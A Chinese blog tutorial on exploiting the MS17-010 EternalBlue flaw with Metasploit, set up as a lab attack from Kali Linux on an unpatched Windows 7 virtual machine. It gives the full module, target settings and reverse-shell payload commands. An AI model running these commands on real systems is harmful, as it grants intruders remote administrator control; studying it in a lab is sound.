ms17-010-永恒之蓝漏洞利用教程

实验环境:虚拟机:kali-linux windows 7 请自行下载安装
1.打开虚拟机 启动kali-linux 启动windows7(未装补丁)
2.获取IP地址(ifconfig ipconfig)
kali-linux :192.168.0.129
windows7 : 192.168.0.130
kali-linux ip

windows ip
3. kali-linux输入msfconsole启动msf(若不是root登陆需sudo提升权限)

root@bogon:~# msfconsole

这里写图片描述
命令提示行显示msf则启动成功。
4. 使用永恒之蓝漏洞

msf > use exploit/windows/smb/ms17_010_eternalblue

这里写图片描述
5. 设定靶机 IP 和操作机 IP

192.168.18.129为操作机kali-linux ip地址
192.168.18.130为靶机windows 7 ip地址

msf exploit (windows/smb/ms17_010_eternalblue) >  set rhost 192.168.18.130
msf exploit (windows/smb/ms17_010_eternalblue) >  set lhost 192.168.18.129

这里写图片描述
6. 设置TCP连接

msf exploit (windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

这里写图片描述
7.攻击

msf exploit (windows/smb/ms17_010_eternalblue) > run

这里写图片描述
测试:
这里写图片描述
已成功获得windows管理员权限!

本教程所用到
虚拟机:kali-linux (kali官网可以下载)
链接: https://pan.baidu.com/s/1VoRDMYyXkdSATL5qV-3QsQ 密码: sjbs
虚拟机:windows 7 (未打永恒之蓝补丁,镜像msdn也可以下载)
链接: https://pan.baidu.com/s/1tImsefcrDtf8Gi3p8FHc1w 密码: nq9f

                           本教程由qianxiao996原创,如需转载,请注明出处!谢谢。
posted @ 2018-08-18 11:14  浅笑996  阅读(308)  评论(0编辑  收藏  举报